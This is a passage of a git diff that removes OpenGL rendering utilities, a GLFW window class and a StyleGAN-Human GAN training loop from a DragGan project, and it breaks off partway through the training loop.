---------------------------------------------------------------------------- - - -_texture_formats = { - ('uint8', 1): dnnlib.EasyDict(type=gl.GL_UNSIGNED_BYTE, format=gl.GL_LUMINANCE, internalformat=gl.GL_LUMINANCE8), - ('uint8', 2): dnnlib.EasyDict(type=gl.GL_UNSIGNED_BYTE, format=gl.GL_LUMINANCE_ALPHA, internalformat=gl.GL_LUMINANCE8_ALPHA8), - ('uint8', 3): dnnlib.EasyDict(type=gl.GL_UNSIGNED_BYTE, format=gl.GL_RGB, internalformat=gl.GL_RGB8), - ('uint8', 4): dnnlib.EasyDict(type=gl.GL_UNSIGNED_BYTE, format=gl.GL_RGBA, internalformat=gl.GL_RGBA8), - ('float32', 1): dnnlib.EasyDict(type=gl.GL_FLOAT, format=gl.GL_LUMINANCE, internalformat=OpenGL.GL.ARB.texture_float.GL_LUMINANCE32F_ARB), - ('float32', 2): dnnlib.EasyDict(type=gl.GL_FLOAT, format=gl.GL_LUMINANCE_ALPHA, internalformat=OpenGL.GL.ARB.texture_float.GL_LUMINANCE_ALPHA32F_ARB), - ('float32', 3): dnnlib.EasyDict(type=gl.GL_FLOAT, format=gl.GL_RGB, internalformat=gl.GL_RGB32F), - ('float32', 4): dnnlib.EasyDict(type=gl.GL_FLOAT, format=gl.GL_RGBA, internalformat=gl.GL_RGBA32F), -} - - -def get_texture_format(dtype, channels): - return _texture_formats[(np.dtype(dtype).name, int(channels))] - -# ---------------------------------------------------------------------------- - - -def prepare_texture_data(image): - image = np.asarray(image) - if image.ndim == 2: - image = image[:, :, np.newaxis] - if image.dtype.name == 'float64': - image = image.astype('float32') - return image - -# ---------------------------------------------------------------------------- - - -def draw_pixels(image, *, pos=0, zoom=1, align=0, rint=True): - pos = np.broadcast_to(np.asarray(pos, dtype='float32'), [2]) - zoom = np.broadcast_to(np.asarray(zoom, dtype='float32'), [2]) - align = np.broadcast_to(np.asarray(align, dtype='float32'), [2]) - image = prepare_texture_data(image) - height, width, channels = image.shape - size = zoom * [width, height] - pos = pos - size * align - if rint: - pos = np.rint(pos) - fmt = get_texture_format(image.dtype, channels) - - gl.glPushAttrib(gl.GL_CURRENT_BIT | gl.GL_PIXEL_MODE_BIT) - gl.glPushClientAttrib(gl.GL_CLIENT_PIXEL_STORE_BIT) - gl.glRasterPos2f(pos[0], pos[1]) - gl.glPixelZoom(zoom[0], -zoom[1]) - gl.glPixelStorei(gl.GL_UNPACK_ALIGNMENT, 1) - gl.glDrawPixels(width, height, fmt.format, fmt.type, image) - gl.glPopClientAttrib() - gl.glPopAttrib() - -# ---------------------------------------------------------------------------- - - -def read_pixels(width, height, *, pos=0, dtype='uint8', channels=3): - pos = np.broadcast_to(np.asarray(pos, dtype='float32'), [2]) - dtype = np.dtype(dtype) - fmt = get_texture_format(dtype, channels) - image = np.empty([height, width, channels], dtype=dtype) - - gl.glPushClientAttrib(gl.GL_CLIENT_PIXEL_STORE_BIT) - gl.glPixelStorei(gl.GL_PACK_ALIGNMENT, 1) - gl.glReadPixels(int(np.round(pos[0])), int( - np.round(pos[1])), width, height, fmt.format, fmt.type, image) - gl.glPopClientAttrib() - return np.flipud(image) - -# ---------------------------------------------------------------------------- - - -class Texture: - def __init__(self, *, image=None, width=None, height=None, channels=None, dtype=None, bilinear=True, mipmap=True): - self.gl_id = None - self.bilinear = bilinear - self.mipmap = mipmap - - # Determine size and dtype. - if image is not None: - image = prepare_texture_data(image) - self.height, self.width, self.channels = image.shape - self.dtype = image.dtype - else: - assert width is not None and height is not None - self.width = width - self.height = height - self.channels = channels if channels is not None else 3 - self.dtype = np.dtype(dtype) if dtype is not None else np.uint8 - - # Validate size and dtype. - assert isinstance(self.width, int) and self.width >= 0 - assert isinstance(self.height, int) and self.height >= 0 - assert isinstance(self.channels, int) and self.channels >= 1 - assert self.is_compatible( - width=width, height=height, channels=channels, dtype=dtype) - - # Create texture object. - self.gl_id = gl.glGenTextures(1) - with self.bind(): - gl.glTexParameterf( - gl.GL_TEXTURE_2D, gl.GL_TEXTURE_WRAP_S, gl.GL_CLAMP_TO_EDGE) - gl.glTexParameterf( - gl.GL_TEXTURE_2D, gl.GL_TEXTURE_WRAP_T, gl.GL_CLAMP_TO_EDGE) - gl.glTexParameterf(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MAG_FILTER, - gl.GL_LINEAR if self.bilinear else gl.GL_NEAREST) - gl.glTexParameterf(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MIN_FILTER, - gl.GL_LINEAR_MIPMAP_LINEAR if self.mipmap else gl.GL_NEAREST) - self.update(image) - - def delete(self): - if self.gl_id is not None: - gl.glDeleteTextures([self.gl_id]) - self.gl_id = None - - def __del__(self): - try: - self.delete() - except: - pass - - @contextlib.contextmanager - def bind(self): - prev_id = gl.glGetInteger(gl.GL_TEXTURE_BINDING_2D) - gl.glBindTexture(gl.GL_TEXTURE_2D, self.gl_id) - yield - gl.glBindTexture(gl.GL_TEXTURE_2D, prev_id) - - def update(self, image): - if image is not None: - image = prepare_texture_data(image) - assert self.is_compatible(image=image) - with self.bind(): - fmt = get_texture_format(self.dtype, self.channels) - gl.glPushClientAttrib(gl.GL_CLIENT_PIXEL_STORE_BIT) - gl.glPixelStorei(gl.GL_UNPACK_ALIGNMENT, 1) - gl.glTexImage2D(gl.GL_TEXTURE_2D, 0, fmt.internalformat, - self.width, self.height, 0, fmt.format, fmt.type, image) - if self.mipmap: - gl.glGenerateMipmap(gl.GL_TEXTURE_2D) - gl.glPopClientAttrib() - - def draw(self, *, pos=0, zoom=1, align=0, rint=False, color=1, alpha=1, rounding=0): - zoom = np.broadcast_to(np.asarray(zoom, dtype='float32'), [2]) - size = zoom * [self.width, self.height] - with self.bind(): - gl.glPushAttrib(gl.GL_ENABLE_BIT) - gl.glEnable(gl.GL_TEXTURE_2D) - draw_rect(pos=pos, size=size, align=align, rint=rint, - color=color, alpha=alpha, rounding=rounding) - gl.glPopAttrib() - - def is_compatible(self, *, image=None, width=None, height=None, channels=None, dtype=None): # pylint: disable=too-many-return-statements - if image is not None: - if image.ndim != 3: - return False - ih, iw, ic = image.shape - if not self.is_compatible(width=iw, height=ih, channels=ic, dtype=image.dtype): - return False - if width is not None and self.width != width: - return False - if height is not None and self.height != height: - return False - if channels is not None and self.channels != channels: - return False - if dtype is not None and self.dtype != dtype: - return False - return True - -# ---------------------------------------------------------------------------- - - -class Framebuffer: - def __init__(self, *, texture=None, width=None, height=None, channels=None, dtype=None, msaa=0): - self.texture = texture - self.gl_id = None - self.gl_color = None - self.gl_depth_stencil = None - self.msaa = msaa - - # Determine size and dtype. - if texture is not None: - assert isinstance(self.texture, Texture) - self.width = texture.width - self.height = texture.height - self.channels = texture.channels - self.dtype = texture.dtype - else: - assert width is not None and height is not None - self.width = width - self.height = height - self.channels = channels if channels is not None else 4 - self.dtype = np.dtype(dtype) if dtype is not None else np.float32 - - # Validate size and dtype. - assert isinstance(self.width, int) and self.width >= 0 - assert isinstance(self.height, int) and self.height >= 0 - assert isinstance(self.channels, int) and self.channels >= 1 - assert width is None or width == self.width - assert height is None or height == self.height - assert channels is None or channels == self.channels - assert dtype is None or dtype == self.dtype - - # Create framebuffer object. - self.gl_id = gl.glGenFramebuffers(1) - with self.bind(): - - # Setup color buffer. - if self.texture is not None: - assert self.msaa == 0 - gl.glFramebufferTexture2D( - gl.GL_FRAMEBUFFER, gl.GL_COLOR_ATTACHMENT0, gl.GL_TEXTURE_2D, self.texture.gl_id, 0) - else: - fmt = get_texture_format(self.dtype, self.channels) - self.gl_color = gl.glGenRenderbuffers(1) - gl.glBindRenderbuffer(gl.GL_RENDERBUFFER, self.gl_color) - gl.glRenderbufferStorageMultisample( - gl.GL_RENDERBUFFER, self.msaa, fmt.internalformat, self.width, self.height) - gl.glFramebufferRenderbuffer( - gl.GL_FRAMEBUFFER, gl.GL_COLOR_ATTACHMENT0, gl.GL_RENDERBUFFER, self.gl_color) - - # Setup depth/stencil buffer. - self.gl_depth_stencil = gl.glGenRenderbuffers(1) - gl.glBindRenderbuffer(gl.GL_RENDERBUFFER, self.gl_depth_stencil) - gl.glRenderbufferStorageMultisample( - gl.GL_RENDERBUFFER, self.msaa, gl.GL_DEPTH24_STENCIL8, self.width, self.height) - gl.glFramebufferRenderbuffer( - gl.GL_FRAMEBUFFER, gl.GL_DEPTH_STENCIL_ATTACHMENT, gl.GL_RENDERBUFFER, self.gl_depth_stencil) - - def delete(self): - if self.gl_id is not None: - gl.glDeleteFramebuffers([self.gl_id]) - self.gl_id = None - if self.gl_color is not None: - gl.glDeleteRenderbuffers(1, [self.gl_color]) - self.gl_color = None - if self.gl_depth_stencil is not None: - gl.glDeleteRenderbuffers(1, [self.gl_depth_stencil]) - self.gl_depth_stencil = None - - def __del__(self): - try: - self.delete() - except: - pass - - @contextlib.contextmanager - def bind(self): - prev_fbo = gl.glGetInteger(gl.GL_FRAMEBUFFER_BINDING) - prev_rbo = gl.glGetInteger(gl.GL_RENDERBUFFER_BINDING) - gl.glBindFramebuffer(gl.GL_FRAMEBUFFER, self.gl_id) - if self.width is not None and self.height is not None: - gl.glViewport(0, 0, self.width, self.height) - yield - gl.glBindFramebuffer(gl.GL_FRAMEBUFFER, prev_fbo) - gl.glBindRenderbuffer(gl.GL_RENDERBUFFER, prev_rbo) - - def blit(self, dst=None): - assert dst is None or isinstance(dst, Framebuffer) - with self.bind(): - gl.glBindFramebuffer(gl.GL_DRAW_FRAMEBUFFER, - 0 if dst is None else dst.fbo) - gl.glBlitFramebuffer(0, 0, self.width, self.height, 0, 0, - self.width, self.height, gl.GL_COLOR_BUFFER_BIT, gl.GL_NEAREST) - -# ---------------------------------------------------------------------------- - - -def draw_shape(vertices, *, mode=gl.GL_TRIANGLE_FAN, pos=0, size=1, color=1, alpha=1): - assert vertices.ndim == 2 and vertices.shape[1] == 2 - pos = np.broadcast_to(np.asarray(pos, dtype='float32'), [2]) - size = np.broadcast_to(np.asarray(size, dtype='float32'), [2]) - color = np.broadcast_to(np.asarray(color, dtype='float32'), [3]) - alpha = np.clip(np.broadcast_to( - np.asarray(alpha, dtype='float32'), []), 0, 1) - - gl.glPushClientAttrib(gl.GL_CLIENT_VERTEX_ARRAY_BIT) - gl.glPushAttrib(gl.GL_CURRENT_BIT | gl.GL_TRANSFORM_BIT) - gl.glMatrixMode(gl.GL_MODELVIEW) - gl.glPushMatrix() - - gl.glEnableClientState(gl.GL_VERTEX_ARRAY) - gl.glEnableClientState(gl.GL_TEXTURE_COORD_ARRAY) - gl.glVertexPointer(2, gl.GL_FLOAT, 0, vertices) - gl.glTexCoordPointer(2, gl.GL_FLOAT, 0, vertices) - gl.glTranslate(pos[0], pos[1], 0) - gl.glScale(size[0], size[1], 1) - gl.glColor4f(color[0] * alpha, color[1] * alpha, color[2] * alpha, alpha) - gl.glDrawArrays(mode, 0, vertices.shape[0]) - - gl.glPopMatrix() - gl.glPopAttrib() - gl.glPopClientAttrib() - -# ---------------------------------------------------------------------------- - - -def draw_arrow(x1, y1, x2, y2, l=10, width=1.0): - # Compute the length and angle of the arrow - dx = x2 - x1 - dy = y2 - y1 - length = math.sqrt(dx**2 + dy**2) - if length < l: - return - angle = math.atan2(dy, dx) - - # Save the current modelview matrix - gl.glPushMatrix() - - # Translate and rotate the coordinate system - gl.glTranslatef(x1, y1, 0.0) - gl.glRotatef(angle * 180.0 / math.pi, 0.0, 0.0, 1.0) - - # Set the line width - gl.glLineWidth(width) - # gl.glColor3f(0.75, 0.75, 0.75) - - # Begin drawing lines - gl.glBegin(gl.GL_LINES) - - # Draw the shaft of the arrow - gl.glVertex2f(0.0, 0.0) - gl.glVertex2f(length, 0.0) - - # Draw the head of the arrow - gl.glVertex2f(length, 0.0) - gl.glVertex2f(length - 2 * l, l) - gl.glVertex2f(length, 0.0) - gl.glVertex2f(length - 2 * l, -l) - - # End drawing lines - gl.glEnd() - - # Restore the modelview matrix - gl.glPopMatrix() - -# ---------------------------------------------------------------------------- - - -def draw_rect(*, pos=0, pos2=None, size=None, align=0, rint=False, color=1, alpha=1, rounding=0): - assert pos2 is None or size is None - pos = np.broadcast_to(np.asarray(pos, dtype='float32'), [2]) - pos2 = np.broadcast_to(np.asarray(pos2, dtype='float32'), [ - 2]) if pos2 is not None else None - size = np.broadcast_to(np.asarray(size, dtype='float32'), [ - 2]) if size is not None else None - size = size if size is not None else pos2 - \ - pos if pos2 is not None else np.array([1, 1], dtype='float32') - pos = pos - size * align - if rint: - pos = np.rint(pos) - rounding = np.broadcast_to(np.asarray(rounding, dtype='float32'), [2]) - rounding = np.minimum( - np.abs(rounding) / np.maximum(np.abs(size), 1e-8), 0.5) - if np.min(rounding) == 0: - rounding *= 0 - vertices = _setup_rect(float(rounding[0]), float(rounding[1])) - draw_shape(vertices, mode=gl.GL_TRIANGLE_FAN, pos=pos, - size=size, color=color, alpha=alpha) - - -@functools.lru_cache(maxsize=10000) -def _setup_rect(rx, ry): - t = np.linspace(0, np.pi / 2, 1 if max(rx, ry) == 0 else 64) - s = 1 - np.sin(t) - c = 1 - np.cos(t) - x = [c * rx, 1 - s * rx, 1 - c * rx, s * rx] - y = [s * ry, c * ry, 1 - s * ry, 1 - c * ry] - v = np.stack([x, y], axis=-1).reshape(-1, 2) - return v.astype('float32') - -# ---------------------------------------------------------------------------- - - -def draw_circle(*, center=0, radius=100, hole=0, color=1, alpha=1): - hole = np.broadcast_to(np.asarray(hole, dtype='float32'), []) - vertices = _setup_circle(float(hole)) - draw_shape(vertices, mode=gl.GL_TRIANGLE_STRIP, pos=center, - size=radius, color=color, alpha=alpha) - - -@functools.lru_cache(maxsize=10000) -def _setup_circle(hole): - t = np.linspace(0, np.pi * 2, 128) - s = np.sin(t) - c = np.cos(t) - v = np.stack([c, s, c * hole, s * hole], axis=-1).reshape(-1, 2) - return v.astype('float32') - -# ---------------------------------------------------------------------------- diff --git a/spaces/DragGan/DragGan/gui_utils/glfw_window.py b/spaces/DragGan/DragGan/gui_utils/glfw_window.py deleted file mode 100644 index 83264eb89a855ec5038cf255994ee2b4b3ddb5ee..0000000000000000000000000000000000000000 --- a/spaces/DragGan/DragGan/gui_utils/glfw_window.py +++ /dev/null @@ -1,229 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -import time -import glfw -import OpenGL.GL as gl -from . import gl_utils - -#---------------------------------------------------------------------------- - -class GlfwWindow: # pylint: disable=too-many-public-methods - def __init__(self, *, title='GlfwWindow', window_width=1920, window_height=1080, deferred_show=True, close_on_esc=True): - self._glfw_window = None - self._drawing_frame = False - self._frame_start_time = None - self._frame_delta = 0 - self._fps_limit = None - self._vsync = None - self._skip_frames = 0 - self._deferred_show = deferred_show - self._close_on_esc = close_on_esc - self._esc_pressed = False - self._drag_and_drop_paths = None - self._capture_next_frame = False - self._captured_frame = None - - # Create window. - glfw.init() - glfw.window_hint(glfw.VISIBLE, False) - self._glfw_window = glfw.create_window(width=window_width, height=window_height, title=title, monitor=None, share=None) - self._attach_glfw_callbacks() - self.make_context_current() - - # Adjust window. - self.set_vsync(False) - self.set_window_size(window_width, window_height) - if not self._deferred_show: - glfw.show_window(self._glfw_window) - - def close(self): - if self._drawing_frame: - self.end_frame() - if self._glfw_window is not None: - glfw.destroy_window(self._glfw_window) - self._glfw_window = None - #glfw.terminate() # Commented out to play it nice with other glfw clients. - - def __del__(self): - try: - self.close() - except: - pass - - @property - def window_width(self): - return self.content_width - - @property - def window_height(self): - return self.content_height + self.title_bar_height - - @property - def content_width(self): - width, _height = glfw.get_window_size(self._glfw_window) - return width - - @property - def content_height(self): - _width, height = glfw.get_window_size(self._glfw_window) - return height - - @property - def title_bar_height(self): - _left, top, _right, _bottom = glfw.get_window_frame_size(self._glfw_window) - return top - - @property - def monitor_width(self): - _, _, width, _height = glfw.get_monitor_workarea(glfw.get_primary_monitor()) - return width - - @property - def monitor_height(self): - _, _, _width, height = glfw.get_monitor_workarea(glfw.get_primary_monitor()) - return height - - @property - def frame_delta(self): - return self._frame_delta - - def set_title(self, title): - glfw.set_window_title(self._glfw_window, title) - - def set_window_size(self, width, height): - width = min(width, self.monitor_width) - height = min(height, self.monitor_height) - glfw.set_window_size(self._glfw_window, width, max(height - self.title_bar_height, 0)) - if width == self.monitor_width and height == self.monitor_height: - self.maximize() - - def set_content_size(self, width, height): - self.set_window_size(width, height + self.title_bar_height) - - def maximize(self): - glfw.maximize_window(self._glfw_window) - - def set_position(self, x, y): - glfw.set_window_pos(self._glfw_window, x, y + self.title_bar_height) - - def center(self): - self.set_position((self.monitor_width - self.window_width) // 2, (self.monitor_height - self.window_height) // 2) - - def set_vsync(self, vsync): - vsync = bool(vsync) - if vsync != self._vsync: - glfw.swap_interval(1 if vsync else 0) - self._vsync = vsync - - def set_fps_limit(self, fps_limit): - self._fps_limit = int(fps_limit) - - def should_close(self): - return glfw.window_should_close(self._glfw_window) or (self._close_on_esc and self._esc_pressed) - - def skip_frame(self): - self.skip_frames(1) - - def skip_frames(self, num): # Do not update window for the next N frames. - self._skip_frames = max(self._skip_frames, int(num)) - - def is_skipping_frames(self): - return self._skip_frames > 0 - - def capture_next_frame(self): - self._capture_next_frame = True - - def pop_captured_frame(self): - frame = self._captured_frame - self._captured_frame = None - return frame - - def pop_drag_and_drop_paths(self): - paths = self._drag_and_drop_paths - self._drag_and_drop_paths = None - return paths - - def draw_frame(self): # To be overridden by subclass. - self.begin_frame() - # Rendering code goes here. - self.end_frame() - - def make_context_current(self): - if self._glfw_window is not None: - glfw.make_context_current(self._glfw_window) - - def begin_frame(self): - # End previous frame. - if self._drawing_frame: - self.end_frame() - - # Apply FPS limit. - if self._frame_start_time is not None and self._fps_limit is not None: - delay = self._frame_start_time - time.perf_counter() + 1 / self._fps_limit - if delay > 0: - time.sleep(delay) - cur_time = time.perf_counter() - if self._frame_start_time is not None: - self._frame_delta = cur_time - self._frame_start_time - self._frame_start_time = cur_time - - # Process events. - glfw.poll_events() - - # Begin frame. - self._drawing_frame = True - self.make_context_current() - - # Initialize GL state. - gl.glViewport(0, 0, self.content_width, self.content_height) - gl.glMatrixMode(gl.GL_PROJECTION) - gl.glLoadIdentity() - gl.glTranslate(-1, 1, 0) - gl.glScale(2 / max(self.content_width, 1), -2 / max(self.content_height, 1), 1) - gl.glMatrixMode(gl.GL_MODELVIEW) - gl.glLoadIdentity() - gl.glEnable(gl.GL_BLEND) - gl.glBlendFunc(gl.GL_ONE, gl.GL_ONE_MINUS_SRC_ALPHA) # Pre-multiplied alpha. - - # Clear. - gl.glClearColor(0, 0, 0, 1) - gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT) - - def end_frame(self): - assert self._drawing_frame - self._drawing_frame = False - - # Skip frames if requested. - if self._skip_frames > 0: - self._skip_frames -= 1 - return - - # Capture frame if requested. - if self._capture_next_frame: - self._captured_frame = gl_utils.read_pixels(self.content_width, self.content_height) - self._capture_next_frame = False - - # Update window. - if self._deferred_show: - glfw.show_window(self._glfw_window) - self._deferred_show = False - glfw.swap_buffers(self._glfw_window) - - def _attach_glfw_callbacks(self): - glfw.set_key_callback(self._glfw_window, self._glfw_key_callback) - glfw.set_drop_callback(self._glfw_window, self._glfw_drop_callback) - - def _glfw_key_callback(self, _window, key, _scancode, action, _mods): - if action == glfw.PRESS and key == glfw.KEY_ESCAPE: - self._esc_pressed = True - - def _glfw_drop_callback(self, _window, paths): - self._drag_and_drop_paths = paths - -#---------------------------------------------------------------------------- diff --git a/spaces/DragGan/DragGan/stylegan_human/training/training_loop.py b/spaces/DragGan/DragGan/stylegan_human/training/training_loop.py deleted file mode 100644 index ddd0c15e226b0436048fee4469341e3fb653c71b..0000000000000000000000000000000000000000 --- a/spaces/DragGan/DragGan/stylegan_human/training/training_loop.py +++ /dev/null @@ -1,427 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -"""Main training loop.""" - -import os -import time -import copy -import json -import pickle -import psutil -import PIL.Image -import numpy as np -import torch -import dnnlib -from torch_utils import misc -from torch_utils import training_stats -from torch_utils.ops import conv2d_gradfix -from torch_utils.ops import grid_sample_gradfix - -import legacy -from metrics import metric_main - -#---------------------------------------------------------------------------- - -def setup_snapshot_image_grid(training_set, random_seed=0): - rnd = np.random.RandomState(random_seed) - gw = np.clip(7680 // training_set.image_shape[2], 7, 32) - gh = np.clip(4320 // training_set.image_shape[1], 4, 32) - - # No labels => show random subset of training samples. - if not training_set.has_labels: - all_indices = list(range(len(training_set))) - rnd.shuffle(all_indices) - grid_indices = [all_indices[i % len(all_indices)] for i in range(gw * gh)] - - else: - # Group training samples by label. - label_groups = dict() # label => [idx, ...] - for idx in range(len(training_set)): - label = tuple(training_set.get_details(idx).raw_label.flat[::-1]) - if label not in label_groups: - label_groups[label] = [] - label_groups[label].append(idx) - - # Reorder. - label_order = sorted(label_groups.keys()) - for label in label_order: - rnd.shuffle(label_groups[label]) - - # Organize into grid. - grid_indices = [] - for y in range(gh): - label = label_order[y % len(label_order)] - indices = label_groups[label] - grid_indices += [indices[x % len(indices)] for x in range(gw)] - label_groups[label] = [indices[(i + gw) % len(indices)] for i in range(len(indices))] - - # Load data. - images, labels = zip(*[training_set[i] for i in grid_indices]) - return (gw, gh), np.stack(images), np.stack(labels) - -#---------------------------------------------------------------------------- - -def save_image_grid(img, fname, drange, grid_size): - lo, hi = drange - img = np.asarray(img, dtype=np.float32) - img = (img - lo) * (255 / (hi - lo)) - img = np.rint(img).clip(0, 255).astype(np.uint8) - - gw, gh = grid_size - _N, C, H, W = img.shape - img = img.reshape([gh, gw, C, H, W]) - img = img.transpose(0, 3, 1, 4, 2) - img = img.reshape([gh * H, gw * W, C]) - - assert C in [1, 3] - if C == 1: - PIL.Image.fromarray(img[:, :, 0], 'L').save(fname) - if C == 3: - PIL.Image.fromarray(img, 'RGB').save(fname) - -#---------------------------------------------------------------------------- - -def training_loop( - run_dir = '.', # Output directory. - training_set_kwargs = {}, # Options for training set. - data_loader_kwargs = {}, # Options for torch.utils.data.DataLoader. - G_kwargs = {}, # Options for generator network. - D_kwargs = {}, # Options for discriminator network. - G_opt_kwargs = {}, # Options for generator optimizer. - D_opt_kwargs = {}, # Options for discriminator optimizer. - augment_kwargs = None, # Options for augmentation pipeline. None = disable. - loss_kwargs = {}, # Options for loss function. - metrics = [], # Metrics to evaluate during training. - random_seed = 0, # Global random seed. - num_gpus = 1, # Number of GPUs participating in the training. - rank = 0, # Rank of the current process in [0, num_gpus[. - batch_size = 4, # Total batch size for one training iteration. Can be larger than batch_gpu * num_gpus. - batch_gpu = 4, # Number of samples processed at a time by one GPU. - ema_kimg = 10, # Half-life of the exponential moving average (EMA) of generator weights. - ema_rampup = 0.05, # EMA ramp-up coefficient. None = no rampup. - G_reg_interval = None, # How often to perform regularization for G? None = disable lazy regularization. - D_reg_interval = 16, # How often to perform regularization for D? None = disable lazy regularization. - augment_p = 0, # Initial value of augmentation probability. - ada_target = None, # ADA target value. None = fixed p. - ada_interval = 4, # How often to perform ADA adjustment? - ada_kimg = 500, # ADA adjustment speed, measured in how many kimg it takes for p to increase/decrease by one unit. - total_kimg = 25000, # Total length of the training, measured in thousands of real images. - kimg_per_tick = 4, # Progress snapshot interval. - image_snapshot_ticks = 50, # How often to save image snapshots? None = disable. - network_snapshot_ticks = 50, # How often to save network snapshots? None = disable. - resume_pkl = None, # Network pickle to resume training from. - resume_kimg = 0, # First kimg to report when resuming training. - cudnn_benchmark = True, # Enable torch.backends.cudnn.benchmark? - abort_fn = None, # Callback function for determining whether to abort training. Must return consistent results across ranks. - progress_fn = None, # Callback function for updating training progress. Called for all ranks. -): - # Initialize. - start_time = time.time() - device = torch.device('cuda', rank) - np.random.seed(random_seed * num_gpus + rank) - torch.manual_seed(random_seed * num_gpus + rank) - torch.backends.cudnn.benchmark = cudnn_benchmark # Improves training speed. - torch.backends.cuda.matmul.allow_tf32 = False # Improves numerical accuracy. - torch.backends.cudnn.allow_tf32 = False # Improves numerical accuracy. - conv2d_gradfix.enabled = True # Improves training speed. - grid_sample_gradfix.enabled = True # Avoids errors with the augmentation pipe. - - # Load training set. - if rank == 0: - print('Loading training set...') - training_set = dnnlib.util.construct_class_by_name(**training_set_kwargs) # subclass of training.dataset.Dataset - training_set_sampler = misc.InfiniteSampler(dataset=training_set, rank=rank, num_replicas=num_gpus, seed=random_seed) - training_set_iterator = iter(torch.utils.data.DataLoader(dataset=training_set, sampler=training_set_sampler, batch_size=batch_size//num_gpus, **data_loader_kwargs)) - if rank == 0: - print() - print('Num images: ', len(training_set)) - print('Image shape:', training_set.image_shape) - print('Label shape:', training_set.label_shape) - print() - - # Construct networks. - if rank == 0: - print('Constructing networks...') - common_kwargs = dict(c_dim=training_set.label_dim, img_resolution=training_set.resolution, img_channels=training_set.num_channels) - G = dnnlib.util.construct_class_by_name(**G_kwargs, **common_kwargs).train().requires_grad_(False).to(device) # subclass of torch.nn.Module - D = dnnlib.util.construct_class_by_name(**D_kwargs, **common_kwargs).train().requires_grad_(False).to(device) # subclass of torch.nn.Module - G_ema = copy.deepcopy(G).eval() - - # Resume from existing pickle. - if (resume_pkl is not None) and (rank == 0): - print(f'Resuming from "{resume_pkl}"') - with dnnlib.util.open_url(resume_pkl) as f: - resume_data = legacy.load_network_pkl(f) - for name, module in [('G', G), ('D', D), ('G_ema', G_ema)]: - misc.copy_params_and_buffers(resume_data[name], module, require_all=False) - - # Print network summary tables. - if rank == 0: - z = torch.empty([batch_gpu, G.z_dim], device=device) - c = torch.empty([batch_gpu, G.c_dim], device=device) - img = misc.print_module_summary(G, [z, c]) - misc.print_module_summary(D, [img, c]) - - # Setup augmentation. - if rank == 0: - print('Setting up augmentation...') - augment_pipe = None - ada_stats = None - if (augment_kwargs is not None) and (augment_p > 0 or ada_target is not None): - augment_pipe = dnnlib.util.construct_class_by_name(**augment_kwargs).train().requires_grad_(False).to(device) # subclass of torch.nn.Module - augment_pipe.p.copy_(torch.as_tensor(augment_p)) - if ada_target is not None: - ada_stats = training_stats.Collector(regex='Loss/signs/real') - - # Distribute across GPUs. - if rank == 0: - print(f'Distributing across {num_gpus} GPUs...') - for module in [G, D, G_ema, augment_pipe]: - if module is not None and num_gpus > 1: - for param in misc.params_and_buffers(module): - torch.distributed.broadcast(param, src=0) - - # Setup training phases. - if rank == 0: - print('Setting up training phases...') - loss = dnnlib.util.construct_class_by_name(device=device, G=G, D=D, augment_pipe=augment_pipe, **loss_kwargs) # subclass of training.loss.Loss - phases = [] - for name, module, opt_kwargs, reg_interval in [('G', G, G_opt_kwargs, G_reg_interval), ('D', D, D_opt_kwargs, D_reg_interval)]: - if reg_interval is None: - opt = dnnlib.util.construct_class_by_name(params=module.parameters(), **opt_kwargs) # subclass of torch.optim.Optimizer - phases += [dnnlib.EasyDict(name=name+'both', module=module, opt=opt, interval=1)] - else: # Lazy regularization. - mb_ratio = reg_interval / (reg_interval + 1) - opt_kwargs = dnnlib.EasyDict(opt_kwargs) - opt_kwargs.lr = opt_kwargs.lr * mb_ratio - opt_kwargs.betas = [beta ** mb_ratio for beta in opt_kwargs.betas] - opt = dnnlib.util.construct_class_by_name(module.parameters(), **opt_kwargs) # subclass of torch.optim.Optimizer - phases += [dnnlib.EasyDict(name=name+'main', module=module, opt=opt, interval=1)] - phases += [dnnlib.EasyDict(name=name+'reg', module=module, opt=opt, interval=reg_interval)] - for phase in phases: - phase.start_event = None - phase.end_event = None - if rank == 0: - phase.start_event = torch.cuda.Event(enable_timing=True) - phase.end_event = torch.cuda.Event(enable_timing=True) - - # Export sample images. - grid_size = None - grid_z = None - grid_c = None - if rank == 0: - print('Exporting sample images...') - grid_size, images, labels = setup_snapshot_image_grid(training_set=training_set) - save_image_grid(images, os.path.join(run_dir, 'reals.png'), drange=[0,255], grid_size=grid_size) - grid_z = torch.randn([labels.shape[0], G.z_dim], device=device).split(batch_gpu) - grid_c = torch.from_numpy(labels).to(device).split(batch_gpu) - images = torch.cat([G_ema(z=z, c=c, noise_mode='const').cpu() for z, c in zip(grid_z, grid_c)]).numpy() - save_image_grid(images, os.path.join(run_dir, 'fakes_init.png'), drange=[-1,1], grid_size=grid_size) - - # Initialize logs. - if rank == 0: - print('Initializing logs...') - stats_collector = training_stats.Collector(regex='.*') - stats_metrics = dict() - stats_jsonl = None - stats_tfevents = None - if rank == 0: - stats_jsonl = open(os.path.join(run_dir, 'stats.jsonl'), 'wt') - try: - import torch.utils.tensorboard as tensorboard - stats_tfevents = tensorboard.SummaryWriter(run_dir) - except ImportError as err: - print('Skipping tfevents export:', err) - - # Train. - if rank == 0: - print(f'Training for {total_kimg} kimg...') - print() - cur_nimg = resume_kimg * 1000 - cur_tick = 0 - tick_start_nimg = cur_nimg - tick_start_time = time.time() - maintenance_time = tick_start_time - start_time - batch_idx = 0 - if progress_fn is not None: - progress_fn(0, total_kimg) - while True: - - # Fetch training data. - with torch.autograd.profiler.record_function('data_fetch'): - phase_real_img, phase_real_c = next(training_set_iterator) - phase_real_img = (phase_real_img.to(device).to(torch.float32) / 127.5 - 1).split(batch_gpu) - phase_real_c = phase_real_c.to(device).split(batch_gpu) - all_gen_z = torch.randn([len(phases) * batch_size, G.z_dim], device=device) - all_gen_z 